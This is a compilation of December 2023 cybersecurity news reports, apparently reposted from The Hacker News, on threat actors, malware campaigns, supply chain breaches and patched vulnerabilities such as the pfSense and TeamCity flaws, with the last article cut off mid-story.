Microsoft Warns of Storm-0539: The Rising Threat Behind Holiday Gift Card Frauds
16.12.23 Cyber The Hacker News
Microsoft is warning of an uptick in malicious activity from an emerging threat cluster it's tracking as Storm-0539 for orchestrating gift card fraud and theft via highly sophisticated email and SMS phishing attacks against retail entities during the holiday shopping season.
The goal of the attacks is to propagate booby-trapped links that direct victims to adversary-in-the-middle (AiTM) phishing pages that are capable of harvesting their credentials and session tokens.
"After gaining access to an initial session and token, Storm-0539 registers their own device for subsequent secondary authentication prompts, bypassing MFA protections and persisting in the environment using the fully compromised identity," the tech giant said in a series of posts on X (formerly Twitter).
The foothold obtained in this manner further acts as a conduit for escalating privileges, moving laterally across the network, and accessing cloud resources in order to grab sensitive information, specifically going after gift card-related services to facilitate fraud.
On top of that, Storm-0539 collects emails, contact lists, and network configurations for follow-on attacks against the same organizations, necessitating the need for robust credential hygiene practices.
Redmond, in its monthly Microsoft 365 Defender report published last month, described the adversary as a financially motivated group that has been active since at least 2021.
"Storm-0539 carries out extensive reconnaissance of targeted organizations in order to craft convincing phishing lures and steal user credentials and tokens for initial access," it said.
"The actor is well-versed in cloud providers and leverages resources from the target organization's cloud services for post-compromise activities."
The disclosure comes days after the company said it obtained a court order to seize the infrastructure of a Vietnamese cybercriminal group called Storm-1152 that sold access to approximately 750 million fraudulent Microsoft accounts as well as identity verification bypass tools for other technology platforms.
Earlier this week, Microsoft also warned that multiple threat actors are abusing OAuth applications to automate financially motivated cyber crimes, such as business email compromise (BEC), phishing, large-scale spamming campaigns, and deploy virtual machines to illicitly mine for cryptocurrencies.
New KV-Botnet Targeting Cisco, DrayTek, and Fortinet Devices for Stealthy Attacks
16.12.23 BotNet The Hacker News
A new botnet consisting of firewalls and routers from Cisco, DrayTek, Fortinet, and NETGEAR is being used as a covert data transfer network for advanced persistent threat actors, including the China-linked threat actor called Volt Typhoon.
Dubbed KV-botnet by the Black Lotus Labs team at Lumen Technologies, the malicious network is an amalgamation of two complementary activity clusters that have been active since at least February 2022.
"The campaign infects devices at the edge of networks, a segment that has emerged as a soft spot in the defensive array of many enterprises, compounded by the shift to remote work in recent years," the company said.
The two clusters – codenamed KY and JDY – are said to be distinct yet working in tandem to facilitate access to high-profile victims as well as establish covert infrastructure. Telemetry data suggests that the botnet is commandeered from IP addresses based in China.
While the bots part of JDY engages in broader scanning using less sophisticated techniques, the KY component, featuring largely outdated and end-of-life products, is assessed to be reserved for manual operations against high-profile targets selected by the former.
It's suspected that Volt Typhoon is at least one user of the KV-botnet and it encompasses a subset of their operational infrastructure, which is evidenced by the noticeable decline in operations in June and early July 2023, coinciding with the public disclosure of the adversarial collective's targeting of critical infrastructure in the U.S.
Microsoft, which first exposed the threat actor's tactics, said it "tries to blend into normal network activity by routing traffic through compromised small office and home office (SOHO) network equipment, including routers, firewalls, and VPN hardware."
The exact initial infection mechanism process used to breach the devices is currently unknown. It's followed by the first-stage malware taking steps to remove security programs and other malware strains so as to ensure that it's the "only presence" on these machines.
It's also designed to retrieve the main payload from a remote server, which, in addition to beaconing back to the same server, is also capable of uploading and downloading files, running commands, and executing additional modules.
Over the past month, the botnet's infrastructure has received a facelift, targeting Axis IP cameras, indicating that the operators could be gearing up for a new wave of attacks.
"One of the rather interesting aspects of this campaign is that all the tooling appears to reside completely in-memory," the researchers said. "This makes detection extremely difficult, at the cost of long-term persistence."
"As the malware resides completely in-memory, by simply power-cycling the device the end user can cease the infection. While that removes the imminent threat, re-infection is occurring regularly."
The findings arrive as The Washington Post reported that two dozen critical entities in the U.S. have been infiltrated by Volt Typhoon over the past year, including power and water utilities as well as communications and transportation systems.
"The hackers often sought to mask their tracks by threading their attacks through innocuous devices such as home or office routers before reaching their victims," the report added.
Crypto Hardware Wallet Ledger's Supply Chain Breach Results in $600,000 Theft
15.12.23 Cryptocurrency The Hacker News
Crypto hardware wallet maker Ledger published a new version of its "@ledgerhq/connect-kit" npm module after unidentified threat actors pushed malicious code that led to the theft of more than $600,000 in virtual assets.
The compromise was the result of a former employee falling victim to a phishing attack, the company said in a statement.
This allowed the attackers to gain access to Ledger's npm account and upload three malicious versions of the module – 1.1.5, 1.1.6, and 1.1.7 — and propagate crypto drainer malware to other applications that are dependent on the module, resulting in a software supply chain breach.
"The malicious code used a rogue WalletConnect project to reroute funds to a hacker wallet," Ledger said.
Connect Kit, as the name implies, makes it possible to connect DApps (short decentralized applications) to Ledger's hardware wallets.
According to security firm Sonatype, version 1.1.7 directly embedded a wallet-draining payload to execute unauthorized transactions in order to transfer digital assets to an actor-controlled wallet.
Versions 1.1.5 and 1.1.6, while lacking an embedded drainer, were modified to download a secondary npm package, identified as 2e6d5f64604be31, which acts as a crypto drainer. The module is still available for download as of writing.
"Once installed into your software, the malware presents the users with a fake modal prompt that invites them to connect wallets," Sonatype researcher Ilkka Turunen said. "Once the users click through this modal, the malware begins draining funds from the connected wallets."
The malicious file is estimated to have been live for around five hours, although the active exploitation window during which the funds were drained was limited to a period of less than two hours.
Ledger has since removed all three malicious versions of Connect Kit from npm and published 1.1.8 to mitigate the issue. It has also reported the threat actor's wallet addresses and noted that stablecoin issuer Tether has frozen the stolen funds.
If anything, the development underscores the continued targeting of open-source ecosystems, with software registries such as PyPI and npm increasingly used as vectors for installing malware through supply chain attacks.
"The specific targeting of cryptocurrency assets demonstrates the evolving tactics of cybercriminals to achieve significant financial gains within the space of hours, directly monetising their malware," Turunen noted.
New Security Vulnerabilities Uncovered in pfSense Firewall Software - Patch Now
15.12.23 Vulnerebility The Hacker News
Multiple security vulnerabilities have been discovered in the open-source Netgate pfSense firewall solution called pfSense that could be chained by an attacker to execute arbitrary commands on susceptible appliances.
The issues relate to two reflected cross-site scripting (XSS) bugs and one command injection flaw, according to new findings from Sonar.
"Security inside a local network is often more lax as network administrators trust their firewalls to protect them from remote attacks," security researcher Oskar Zeino-Mahmalat said.
"Potential attackers could have used the discovered vulnerabilities to spy on traffic or attack services inside the local network."
Impacting pfSense CE 2.7.0 and below and pfSense Plus 23.05.1 and below, the shortcomings could be weaponized by tricking an authenticated pfSense user (i.e., an admin user) into clicking on a specially crafted URL, which contains an XSS payload that activates command injection.
A brief description of the flaws is given below -
CVE-2023-42325 (CVSS score: 5.4) - An XSS vulnerability that allows a remote attacker to gain privileges via a crafted url to the status_logs_filter_dynamic.php page. As a result, attacks of this kind are triggered by means of crafted links embedded in phishing messages or a third-party website, for example, in a comment section or in the form of links shared on social media posts. In the case of pfSense, the threat actor can perform actions in the firewall with the victim's permissions. "Because the pfSense process runs as root to be able to change networking settings, the attacker can execute arbitrary system commands as root using this attack," Zeino-Mahmalat said. Cybersecurity The development comes weeks after Sonar detailed a remote code execution flaw in Microsoft Visual Studio Code's built-in integration of npm (CVE-2023-36742, CVSS score: 7.8) that could be weaponized to execute arbitrary commands. It was addressed by Microsoft as part of its Patch Tuesday updates for September 2023.
CVE-2023-42327 (CVSS score: 5.4) - An XSS vulnerability that allows a remote attacker to gain privileges via a crafted URL to the getserviceproviders.php page.
CVE-2023-42326 (CVSS score: 8.8) - A lack of validation that allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.
Reflected XSS attacks, also called non-persistent attacks, occur when an attacker delivers a malicious script to a vulnerable web application, which is then returned in the HTTP response and executed on the victim's web browser.
Following responsible disclosure on July 3, 2023, the flaws were addressed in pfSense CE 2.7.1 and pfSense Plus 23.09 released last month.
Google's New Tracking Protection in Chrome Blocks Third-Party Cookies
15.12.23 Safety The Hacker News
Google on Thursday announced that it will start testing a new feature called "Tracking Protection" starting January 4, 2024, to 1% of Chrome users as part of its efforts to deprecate third-party cookies in the web browser.
The setting is designed to limit "cross-site tracking by restricting website access to third-party cookies by default," Anthony Chavez, vice president of Privacy Sandbox at Google, said.
The tech giant noted that participants for Tracking Protection will be selected at random and that chosen users will be notified upon opening Chrome on either a desktop or an Android device.
The goal is to restrict third-party cookies (also called "non-essential cookies") by default, preventing them from being used to track users as they move from one website to the other for serving personalized ads.
While several major browsers like Apple Safari and Mozilla Firefox have either already placed restrictions on third-party cookies via features like Intelligent Tracking Prevention (ITP) and Enhanced Tracking Protection in Firefox, Google is taking more of a middle-ground approach that involves devising alternatives where users can access free online content and services without compromising on their privacy.
In mid-October 2023, Google confirmed its plans to "disable third-party cookies for 1% of users from Q1 2024 to facilitate testing, and then ramp up to 100% of users from Q3 2024."
Privacy Sandbox, instead of providing a cross-site or cross-app user identifier, "aggregates, limits, or noises data" through APIs like Protected Audience (formerly FLEDGE), Topics, and Attribution Reporting to help prevent user re-identification.
In doing so, the goal is to block third-parties from tracking user browsing behavior across sites, while still allowing sites and apps to serve relevant ads and enabling advertisers to measure the performance of their online ads without using individual identifiers.
"With Tracking Protection, Privacy Sandbox and all of the features we launch in Chrome, we'll continue to work to create a web that's more private than ever, and universally accessible to everyone," Chavez said.
New NKAbuse Malware Exploits NKN Blockchain Tech for DDoS Attacks
15.12.23 Virus The Hacker News
A novel multi-platform threat called NKAbuse has been discovered using a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel.
"The malware utilizes NKN technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities," Russian cybersecurity company Kaspersky said in a Thursday report.
NKN, which has over 62,000 nodes, is described as a "software overlay network built on top of today's Internet that enables users to share unused bandwidth and earn token rewards." It incorporates a blockchain layer on top of the existing TCP/IP stack.
While threat actors are known to take advantage of emerging communication protocols for command-and-control (C2) purposes and evade detection, NKAbuse leverages blockchain technology to conduct distributed denial-of-service (DDoS) attacks and function as an implant inside compromised systems.
Specifically, it uses the protocol to talk to the bot master and receive/send commands. The malware is implemented in the Go programming language, and evidence points to it being used primarily to single out Linux systems, including IoT devices.
It's currently not known how widespread the attacks are, but one instance identified by Kaspersky entails the exploitation of a six-year-old critical security flaw in Apache Struts (CVE-2017-5638, CVSS score: 10.0) to breach an unnamed financial company.
Successful exploitation is followed by the delivery of an initial shell script that's responsible for downloading the implant from a remote server, but not before checking the operating system of the target host. The server hosting the malware houses eight different versions of NKAbuse to support various CPU architectures: i386, arm64, arm, amd64, mips, mipsel, mips64, and mips64el.
Another notable aspect is its lack of a self-propagation mechanism, meaning the malware needs to be delivered to a target by another initial access pathway, such as through the exploitation of security flaws.
"NKAbuse makes use of cron jobs to survive reboots," Kaspersky said. "To achieve that, it needs to be root. It checks that the current user ID is 0 and, if so, proceeds to parse the current crontab, adding itself for every reboot."
NKAbuse also incorporates a bevy of backdoor features that allow it to periodically send a heartbeat message to the bot master, which contains information about the system, capture screenshots of the current screen, perform file operations, and run system commands.
"This particular implant appears to have been meticulously crafted for integration into a botnet, yet it can adapt to functioning as a backdoor in a specific host," Kaspersky said. "Moreover, its use of blockchain technology ensures both reliability and anonymity, which indicates the potential for this botnet to expand steadily over time, seemingly devoid of an identifiable central controller."
"We are surprised to see NKN is used in such a way," Zheng "Bruce" Li, co-founder of NKN, told The Hacker News. "We built NKN to provide true peer-to-peer communication that is secure, private, decentralized, and massively scalable. We are trying to learn more about the report to see if together we can make the internet safe and neutral."
116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems
15.12.23 Virus The Hacker News
Cybersecurity researchers have identified a set of 116 malicious packages on the Python Package Index (PyPI) repository that are designed to infect Windows and Linux systems with a custom backdoor.
"In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene Holt said in a report published earlier this week.
The packages are estimated to have been downloaded over 10,000 times since May 2023.
The threat actors behind the activity have been observed using three techniques to bundle malicious code into Python packages, namely via a test.py script, embedding PowerShell in setup.py file, and incorporating it in obfuscated form in the __init__.py file.
Irrespective of the method used, the end goal of the campaign is to compromise the targeted host with malware, primarily a backdoor capable of remote command execution, data exfiltration, and taking screenshots. The backdoor module is implemented in Python for Windows and in Go for Linux.
Alternately, the attack chains also culminate in the deployment of W4SP Stealer or a clipper malware designed to keep close tabs on a victim's clipboard activity and swapping the original wallet address, if present, with an attacker-controlled address.
The development is the latest in a wave of compromised Python packages attackers have released to poison the open-source ecosystem and distribute a medley of malware for supply chain attacks.
It's also the newest addition to a steady stream of bogus PyPI packages that have acted as a stealthy channel for distributing stealer malware. In May 2023, ESET revealed another cluster of libraries that were engineered to propagate Sordeal Stealer, which borrows its features from W4SP Stealer.
Then, last month, malicious packages masquerading as seemingly innocuous obfuscation tools were found to deploy a stealer malware codenamed BlazeStealer.
"Python developers should thoroughly vet the code they download, especially checking for these techniques, before installing it on their systems," the researchers cautioned.
The disclosure also follows the discovery of npm packages that were found targeting an unnamed financial institution as part of an "advanced adversary simulation exercise." The names of the modules, which contained an encrypted blob, have been withheld to protect the identity of the organization.
"This decrypted payload contains an embedded binary that cleverly exfiltrates user credentials to a Microsoft Teams webhook that is internal to the target company in question," software supply chain security firm Phylum disclosed last week.
New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities
14.12.23 BigBrothers The Hacker News
A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi.
The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it's implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor.
"Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war," security researcher Aleksandar Milenkoski said in a report shared with The Hacker News.
Gaza Cyber Gang, believed to be active since at least 2012, has a history of striking targets throughout the Middle East, particularly Israel and Palestine, often leveraging spear-phishing as a method of initial access.
Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpStage, Spark, Pierogi, PoisonIvy, and XtremeRAT among others.
The threat actor is assessed to be a composite of several sub-groups that share overlapping victimology footprints and malware, such as Molerats, Arid Viper, and a cluster referred to as Operation Parliament by Kaspersky.
In recent months, the adversarial collective has been linked to a series of attacks that deliver improvised variants of its Micropsia and Arid Gopher implants as well as a new initial access downloader dubbed IronWind.
The latest set of intrusions mounted by Gaza Cyber Gang has been found to leverage Pierogi++ and Micropsia. The first recorded use of Pierogi++ goes back to late 2022.
Attack chains are characterized by the use of decoy documents written in Arabic or English and pertaining to matters of interest to Palestinians to deliver the backdoors.
Cybereason, which shed light on Pierogi in February 2020, described it as an implant that allows attackers to spy on targeted victims and that the "commands used to communicate with the [command-and-control] servers and other strings in the binary are written in Ukrainian."
"The backdoor may have been obtained in underground communities rather than home-grown," it assessed at the time.
Both Pierogi and Pierogi++ are equipped to take screenshots, execute commands, and download attacker-provided files. Another notable aspect is that the updated artifacts no longer feature any Ukrainian strings in the code.
SentinelOne's investigation into Gaza Cyber Gang's operations have also yielded tactical connections between two disparate campaigns referred to as Big Bang and Operation Bearded Barbie, in addition to reinforcing ties between the threat actor and WIRTE, as previously disclosed by Kaspersky in November 2021.
The sustained focus on Palestine notwithstanding, the discovery of Pierogi++ underscores that the group continues to refine and retool its malware to ensure successful compromise of targets and to maintain persistent access to their networks.
"The observed overlaps in targeting and malware similarities across the Gaza Cybergang sub-groups after 2018 suggests that the group has likely been undergoing a consolidation process," Milenkoski said.
"This possibly includes the formation of an internal malware development and maintenance hub and/or streamlining supply from external vendors."
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders
14.12.23 BigBrothers The Hacker News
The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel.
The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader dubbed SampleCheck5000 (or SC5k).
"These lightweight downloaders [...] are notable for using one of several legitimate cloud service APIs for [command-and-control] communication and data exfiltration: the Microsoft Graph OneDrive or Outlook APIs, and the Microsoft Office Exchange Web Services (EWS) API," security researchers Zuzana Hromcová and Adam Burgher said in a report shared with The Hacker News.
By using well-known cloud service providers for command-and-control communication, the goal is to blend with authentic network traffic and cover up the group's attack infrastructure.
Some of the targets of the campaign include an organization in the healthcare sector, a manufacturing company, and a local governmental organization, among others. All the victims are said to have been previously targeted by the threat actor.
The exact initial access vector used to compromise the targets is currently unclear and it's not known if the attackers managed to retain their foothold in the networks so as to deploy these downloaders at various points of time in 2022.
OilRig, also known as APT34, Crambus, Cobalt Gypsy, Hazel Sandstorm (formerly EUROPIUM), and Helix Kitten, is an Iranian cyber espionage group that's known to be active since at least 2014, using a wide range of malware at its disposal to target entities in the Middle East.
This year alone, the hacking crew has been observed leveraging novel malware like MrPerfectionManager, PowerExchange, Solar, Mango, and Menorah.
ODAgent, first detected in February 2022, is a C#/.NET downloader that utilizes Microsoft OneDrive API for command-and-control (C2) communications, allowing the threat actor to download and execute payloads, and exfiltrate staged files.
SampleCheck5000, on the other hand, is designed to interact with a shared Microsoft Exchange mail account to download and execute additional OilRig tools using the Office Exchange Web Services (EWS) API.
OilBooster, in the same way as ODAgent, uses Microsoft OneDrive API for C2, whereas OilCheck adopts the same technique as SampleCheck5000 to extract commands embedded in draft messages. But instead of using the EWS API, it leverages Microsoft Graph API for network communications.
OilBooster is also similar to OilCheck in that it employs the Microsoft Graph API to connect to a Microsoft Office 365 account. What's different this time around is that the API is used to interact with an actor-controlled OneDrive account as opposed to an Outlook account in order to fetch commands and payloads from victim-specific folders.
These tools also share similarities with MrPerfectionManager and PowerExchange backdoors when it comes to using email-based C2 protocols to exfiltrate data, although in the case of the latter, the victimized organization's Exchange Server is used to send messages to the attacker's email account.
"In all cases, the downloaders use a shared (email or cloud storage) OilRig-operated account to exchange messages with the OilRig operators; the same account is typically shared by multiple victims," the researchers explained.
"The downloaders access this account to download commands and additional payloads staged by the operators, and to upload command output and staged files."
Russian SVR-Linked APT29 Targets JetBrains TeamCity Servers in Ongoing Attacks
14.12.23 APT The Hacker News
Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023.
The activity has been tied to a nation-state group known as APT29, which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It's notable for the supply chain attack targeting SolarWinds and its customers in 2020.
"The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments," cybersecurity agencies from Poland, the U.K., and the U.S. said.
The vulnerability in question is CVE-2023-42793 (CVSS score: 9.8), a critical security flaw that could be weaponized by unauthenticated attackers to achieve remote code execution on affected systems. It has since come under active exploitation by hacking crews, including those associated with North Korea, for malware delivery.
"The TeamCity exploitation usually resulted in code execution with high privileges granting the SVR an advantageous foothold in the network environment," the agencies noted.
"If compromised, access to a TeamCity server would provide malicious actors with access to that software developer's source code, signing certificates, and the ability to subvert software compilation and deployment processes — access a malicious actor could further use to conduct supply chain operations."
A successful initial access is typically followed by reconnaissance, privilege escalation, lateral movement, and data exfiltration, while simultaneously taking steps to evade detection using an open-source tool called EDRSandBlast. The end goal of the attacks is to deploy a backdoor codenamed GraphicalProton that functions as a loader to deliver additional payloads.
GraphicalProton, which is also known as VaporRage, leverages OneDrive as a primary command-and-control (C2) communication channel, with Dropbox treated as a fallback mechanism. It has been put to use by the threat actor as part of an ongoing campaign dubbed Diplomatic Orbiter that singles out diplomatic agencies across the world.
As many as 100 devices located across the U.S., Europe, Asia, and Australia are said to have been compromised as a result of what's suspected to be opportunistic attacks.
Targets of the campaign include an energy trade association; firms that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT enterprises.
The disclosure comes as Microsoft revealed Russia's multi-pronged assault on Ukraine's agriculture sector between June through September 2023 to penetrate networks, exfiltrate data, and deploy destructive malware such as SharpWipe (aka WalnutWipe).
The intrusions have been tied back to two nation-state groups codenamed Aqua Blizzard (formerly Actinium) and Seashell Blizzard (formerly Iridium), respectively.
Seashell Blizzard has also been observed taking advantage of pirated Microsoft Office software harboring the DarkCrystalRAT (aka DCRat) backdoor to gain initial access, subsequently using it to download a second-stage payload named Shadowlink that masquerades as Microsoft Defender but, in reality, installs a TOR service for surreptitious remote access.
"Midnight Blizzard took a kitchen sink approach, using password spray, credentials acquired from third-parties, believable social engineering campaigns via Teams, and abuse of cloud services to infiltrate cloud environments," the tech giant said.
Microsoft further highlighted a Russia-affiliated influence actor it calls Storm-1099 (aka Doppelganger) for carrying out sophisticated pro-Russia influence operations targeting international supporters of Ukraine since the spring of 2022.
Other influence efforts comprise spoofing mainstream media and deceptively editing celebrity videos shared on Cameo to propagate anti-Ukraine video content and malign President Volodymyr Zelensky by falsely claiming he suffered from substance abuse issues, underscoring continued efforts to warp global perceptions of the war.
"This campaign marks a novel approach by pro-Russia actors seeking to further the narrative in the online information space," Microsoft said. "Russian cyber and influence operators have demonstrated adaptability throughout the war on Ukraine."
Update#
Following the publication of the story, Yaroslav Russkih, head of security at JetBrains, shared the following statement with The Hacker News -
"We were informed about this vulnerability earlier this year and immediately fixed it in TeamCity 2023.05.4 update, which was released on September 18, 2023. Since then, we have been contacting our customers directly or via public posts motivating them to update their software. We also released a dedicated security patch for organizations using older versions of TeamCity that they couldn't upgrade in time. In addition, we have been sharing the best security practices to help our customers strengthen the security of their build pipelines. As of right now, according to the statistics we have, fewer than 2% of TeamCity instances still operate unpatched software, and we hope their owners patch them immediately. This vulnerability only affects the on-premises instances of TeamCity, while our cloud version was not impacted."
New Hacker Group 'GambleForce' Tageting APAC Firms Using SQL Injection Attacks
14.12.23 Hacking The Hacker News
A previously unknown hacker outfit called GambleForce has been attributed to a series of SQL injection attacks against companies primarily in the Asia-Pacific (APAC) region since at least September 2023.
"GambleForce uses a set of basic yet very effective techniques, including SQL injections and the exploitation of vulnerable website content management systems (CMS) to steal sensitive information, such as user credentials," Singapore-headquartered Group-IB said in a report shared with The Hacker News.
The group is estimated to have targeted 24 organizations in the gambling, government, retail, and travel sectors across Australia, Brazil, China, India, Indonesia, the Philippines, South Korea, and Thailand. Six of these attacks were successful.
The modus operandi of GambleForce is its exclusive reliance on open-source tools like dirsearch, sqlmap, tinyproxy, and redis-rogue-getshell at different stages of the attacks with the ultimate goal of exfiltrating sensitive information from compromised networks.
Also used by the threat actor is the legitimate post-exploitation framework known as Cobalt Strike. Interestingly, the version of the tool discovered on its attack infrastructure used commands in Chinese, although the group's origins are far from clear.
The attack chains entail the abuse of victims' public-facing applications of victims by exploiting SQL injections as well as the exploitation of CVE-2023-23752, a medium-severity flaw in Joomla CMS, to gain unauthorized access to a Brazilian company.
It's currently not known how GambleForce leverages the stolen information. The cybersecurity firm said it also took down the adversary's command-and-control (C2) server and notified the identified victims.
"Web injections are among the oldest and most popular attack vectors," Nikita Rostovcev, senior threat analyst at Group-IB, said.
"And the reason being is that sometimes developers overlook the importance of input security and data validation. Insecure coding practices, incorrect database settings, and outdated software create a fertile environment for SQL injection attacks on web applications."
Microsoft Takes Legal Action to Crack Down on Storm-1152's Cybercrime Network
14.12.23 Cyber The Hacker News
Microsoft on Wednesday said it obtained a court order to seize infrastructure set up by a group called Storm-1152 that peddled roughly 750 million fraudulent Microsoft accounts and tools through a network of bogus websites and social media pages to other criminal actors, netting them millions of dollars in illicit revenue.
"Fraudulent online accounts act as the gateway to a host of cybercrime, including mass phishing, identity theft and fraud, and distributed denial-of-service (DDoS) attacks," Amy Hogan-Burney, the company's associate general counsel for cybersecurity policy and protection, said.
These cybercrime-as-a-service (CaaS) offerings, per Redmond, are designed to get around identity verification software across various technology platforms and help minimize the efforts needed to conduct malicious activities online, including phishing, spamming, ransomware, and fraud, effectively lowering the barriers to entry for attackers.
Multiple threat actors, counting Octo Tempest (aka Scattered Spider), are said to have used Storm-1152's accounts to pull off ransomware, data theft, and extortion schemes. Two other financially motivated threat actors that have purchased fraudulent accounts from Storm-1152 to scale their own attacks are Storm-0252 and Storm-0455.
The group, active since at least 2021, has been attributed to the following websites and pages -
Hotmailbox.me for selling fraudulent Microsoft Outlook accounts
1stCAPTCHA, AnyCAPTCHA, and NoneCAPTCHA for selling machine learning-based CAPTCHA solving services to bypass identity verification
Social media pages for advertising the services
Microsoft, which collaborated with Arkose Labs on the initiative, said it was able to identify three individuals based in Vietnam who were instrumental in developing and maintaining the infrastructure: Duong Dinh Tu, Linh Van Nguyễn (also known as Nguyễn Van Linh), and Tai Van Nguyen.
"These individuals operated and wrote the code for the illicit websites, published detailed step-by-step instructions on how to use their products via video tutorials and provided chat services to assist those using their fraudulent services," Hogan-Burney noted.
"Not only did the company sell its technology like any other kind of software company – with pricing structures based upon a customer's needs – but it also would perform fake account registration attacks, sell those fake accounts to other cybercriminals, and then cash out with crypto currency," Kevin Gosschalk and Patrice Boffa said.
BazaCall Phishing Scammers Now Leveraging Google Forms for Deception
14.12.23 Phishing The Hacker News
The threat actors behind the BazaCall call back phishing attacks have been observed leveraging Google Forms to lend the scheme a veneer of credibility.
The method is an "attempt to elevate the perceived authenticity of the initial malicious emails," cybersecurity firm Abnormal Security said in a report published today.
BazaCall (aka BazarCall), which was first observed in late 2020, refers to a series of phishing attacks in which email messages impersonating legitimate subscription notices are sent to targets, urging them to contact a support desk to dispute or cancel the plan, or risk getting charged anywhere between $50 to $500.
By inducing a false sense of urgency, the attacker convinces the target over a phone call to grant them remote access capabilities using remote desktop software and ultimately establish persistence on the host under the guise of offering help to cancel the supposed subscription.
Some of the popular services that are impersonated include Netflix, Hulu, Disney+, Masterclass, McAfee, Norton, and GeekSquad.
In the latest attack variant detected by Abnormal Security, a form created using Google Forms is used as a conduit to share details of the purported subscription.
It's worth noting that the form has its response receipts enabled, which sends a copy of the response to the form respondent by email, so that the attacker can send an invitation to complete the form themselves and receive the responses.
"Because the attacker enabled the response receipt option, the target will receive a copy of the completed form, which the attacker has designed to look like a payment confirmation for Norton Antivirus software," security researcher Mike Britton said.
The use of Google Forms is also clever in that the responses are sent from the address "forms-receipts-noreply@google[.]com," which is a trusted domain and, therefore, have a higher chance of bypassing secure email gateways, as evidenced by a recent Google Forms phishing campaign uncovered by Cisco Talos last month.
"Additionally, Google Forms often use dynamically generated URLs," Britton explained. "The constantly changing nature of these URLs can evade traditional security measures that utilize static analysis and signature-based detection, which rely on known patterns to identify threats."
Threat Actor Targets Recruiters With More_eggs Backdoor#
The disclosure arrives as Proofpoint revealed a new phishing campaign that's targeting recruiters with direct emails that ultimately lead to a JavaScript backdoor known as More_eggs.
The enterprise security firm attributed the attack wave to a "skilled, financially motivated threat actor" it tracks as TA4557, which has a track record of abusing legitimate messaging services and offering fake jobs via email to ultimately deliver the More_eggs backdoor.
"Specifically in the attack chain that uses the new direct email technique, once the recipient replies to the initial email, the actor was observed responding with a URL linking to an actor-controlled website posing as a candidate resume," Proofpoint said.
"Alternatively, the actor was observed replying with a PDF or Word attachment containing instructions to visit the fake resume website."
More_eggs is offered as malware-as-a-service, and is used by other prominent cybercriminal groups like Cobalt Group (aka Cobalt Gang), Evilnum, and FIN6. Earlier this year, eSentire linked the malware to two operators from Montreal and Bucharest.
Google Using Clang Sanitizers to Protect Android Against Cellular Baseband Vulnerabilities
13.12.23 OS The Hacker News
Google is highlighting the role played by Clang sanitizers in hardening the security of the cellular baseband in the Android operating system and preventing specific kinds of vulnerabilities.
This comprises Integer Overflow Sanitizer (IntSan) and BoundsSanitizer (BoundSan), both of which are part of UndefinedBehaviorSanitizer (UBSan), a tool designed to catch various kinds of undefined behavior during program execution.
"They are architecture agnostic, suitable for bare-metal deployment, and should be enabled in existing C/C++ code bases to mitigate unknown vulnerabilities," Ivan Lozano and Roger Piqueras Jover said in a Tuesday post.
The development comes months after the tech giant said it's working with ecosystem partners to increase the security of firmware that interacts with Android, thereby making it difficult for threat actors to achieve remote code execution within the Wi-Fi SoC or the cellular baseband.
IntSan and BoundSan are two of the compiler-based sanitizers that Google has enabled as an exploit mitigation measure to detect arithmetic overflows and perform bounds checks around array accesses, respectively.
Google acknowledged that while both BoundSan and IntSan incur a substantial performance overhead, it has enabled it in security-critical attack surfaces ahead of a full-fledged rollout over the entire codebase. This covers -
Functions parsing messages delivered over the air in 2G, 3G, 4G, and 5G
Libraries encoding/decoding complex formats (e.g., ASN.1, XML, DNS, etc.)
IMS, TCP, and IP stacks, and
Messaging functions (SMS, MMS)
"In the particular case of 2G, the best strategy is to disable the stack altogether by supporting Android's '2G toggle,'" the researchers said. "However, 2G is still a necessary mobile access technology in certain parts of the world and some users might need to have this legacy protocol enabled."
It's worth noting that the "tangible" benefits arising out of deploying sanitizers notwithstanding, they do not address other classes of vulnerabilities, such as those related to memory safety, necessitating a transition of the codebase to a memory-safe language like Rust.
In early October 2023, Google announced that it had rewritten the Android Virtualization Framework's (AVF) protected VM (pVM) firmware in Rust to provide a memory-safe foundation for the pVM root of trust.
"As the high-level operating system becomes a more difficult target for attackers to successfully exploit, we expect that lower level components such as the baseband will attract more attention," the researchers concluded.
"By using modern toolchains and deploying exploit mitigation technologies, the bar for attacking the baseband can be raised as well."
Microsoft Warns of Hackers Exploiting OAuth for Cryptocurrency Mining and Phishing
13.12.23 Exploit The Hacker News
Microsoft has warned that adversaries are using OAuth applications as an automation tool to deploy virtual machines (VMs) for cryptocurrency mining and launch phishing attacks.
"Threat actors compromise user accounts to create, modify, and grant high privileges to OAuth applications that they can misuse to hide malicious activity," the Microsoft Threat Intelligence team said in an analysis.
"The misuse of OAuth also enables threat actors to maintain access to applications even if they lose access to the initially compromised account."
OAuth, short for Open Authorization, is an authorization and delegation framework (as opposed to authentication) that provides applications the ability to securely access information from other websites without handing over passwords.
In the attacks detailed by Microsoft, threat actors have been observed launching phishing or password-spraying attacks against poorly secured accounts with permissions to create or modify OAuth applications.
